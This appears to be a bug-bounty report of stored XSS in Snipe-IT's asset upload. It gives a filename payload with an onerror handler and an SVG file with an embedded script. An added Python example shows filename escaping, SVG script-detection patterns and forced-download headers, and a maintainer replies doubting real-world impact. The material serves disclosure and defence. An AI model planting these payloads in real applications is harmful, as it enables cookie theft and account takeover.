Cross-site Scripting (XSS) - Generic in snipe/snipe-it
Reported on
Oct 5th 2021
Description
The asset file upload feature allows arbitrary execution of JavaScript (stored XSS), both through the uploaded file's name and through the contents of an uploaded .svg file.
Steps to Reproduce
XSS via the filename
Go to the detail page of an asset.
On the File tab, upload a file whose name contains the payload: file'><img src=x onerror=alert(1)>name
XSS via an uploaded .svg file (.svg is not in the list of allowed file types, yet the upload is accepted)
Go to the detail page of an asset.
On the File tab, upload an .svg file with the following content as the payload:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("XSS");
</script>
</svg>
After the upload completes, click the file to download it.
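Added example (not part of the report and not Snipe-IT's own code): the two server-side checks that close both reproduction paths above, written as a small Python module. The extension allow-list, function names and header set are assumptions chosen for illustration; the SVG sample is the payload reproduced from the report. The filename is escaped before it is rendered into HTML, the upload is checked against an extension allow-list and then sniffed for active SVG content regardless of its extension, and the download response is forced to an attachment with nosniff so the browser never renders the file inline.

```python
import html
import re
from dataclasses import dataclass

# Hypothetical allow-list for this example; Snipe-IT's real list is not reproduced here.
ALLOWED_EXTENSIONS = {"png", "gif", "jpg", "jpeg", "pdf", "doc", "docx", "xls", "xlsx", "txt"}

# Content sniffing: an SVG is XML text containing an <svg element; active content is
# a <script> element, an on*= event-handler attribute, or a javascript: URL.
_SVG_RE = re.compile(rb"<\s*svg[\s>]", re.IGNORECASE)
_SCRIPT_RE = re.compile(rb"<\s*script[\s>]|\bon[a-z]+\s*=|javascript:", re.IGNORECASE)

# The SVG payload from the report, embedded here as sample input.
SVG_PAYLOAD = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("XSS");
</script>
</svg>
"""


@dataclass
class UploadDecision:
    accepted: bool
    reason: str
    stored_name: str = ""


def sanitize_filename(name: str) -> str:
    """Produce the name used on disk: no directory parts, conservative charset, bounded length."""
    base = name.replace("\\", "/").rsplit("/", 1)[-1]
    base = re.sub(r"[^A-Za-z0-9._-]", "_", base)
    base = base.strip("._") or "upload"
    return base[:128]


def validate_upload(original_name: str, content: bytes) -> UploadDecision:
    """Reject disallowed extensions, then reject active SVG content whatever the extension says."""
    ext = original_name.rsplit(".", 1)[-1].lower() if "." in original_name else ""
    if ext not in ALLOWED_EXTENSIONS:
        return UploadDecision(False, f"extension {ext!r} not allowed")
    # Do not trust the extension: an SVG renamed to .png still executes if it is ever rendered inline.
    if _SVG_RE.search(content[:4096]) and _SCRIPT_RE.search(content):
        return UploadDecision(False, "active content (script/event handler) in SVG body")
    return UploadDecision(True, "ok", sanitize_filename(original_name))


def display_name_html(original_name: str) -> str:
    """Escape the user-controlled filename before it is placed into an HTML page (the first vector)."""
    return html.escape(original_name, quote=True)


def download_headers(stored_name: str) -> dict:
    """Headers for serving a stored file: attachment + nosniff keeps the browser from rendering it."""
    return {
        "Content-Disposition": f'attachment; filename="{stored_name}"',
        "X-Content-Type-Options": "nosniff",
        "Content-Type": "application/octet-stream",
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }


if __name__ == "__main__":
    name = "file'><img src=x onerror=alert(1)>name"
    print("escaped for HTML:", display_name_html(name))
    print("stored as:", sanitize_filename(name))
    print("svg upload:", validate_upload("payload.svg", SVG_PAYLOAD))
    print("svg as .png:", validate_upload("logo.png", SVG_PAYLOAD))
```

The content check only blocks SVGs that carry script or event handlers; a static SVG renamed to .png still passes, which is acceptable only because the download headers prevent inline rendering. Both layers are needed: the allow-list alone fails once an extension is bypassed, and the forced download alone does nothing for the filename rendered in the asset's file list.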
Impact
This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.
Hi - thanks for this. I'm unclear on how this actually works IRL though. We force a download for uploaded files, which means you'd have to download it, which means any image editor would nullify any JavaScript and any sessions attached to it.
If you can provide me with a little more detail on how you're seeing this work in the wild (screenshots would be great) we can take a look.
I have a PR up against master right now, it's just awaiting QA finals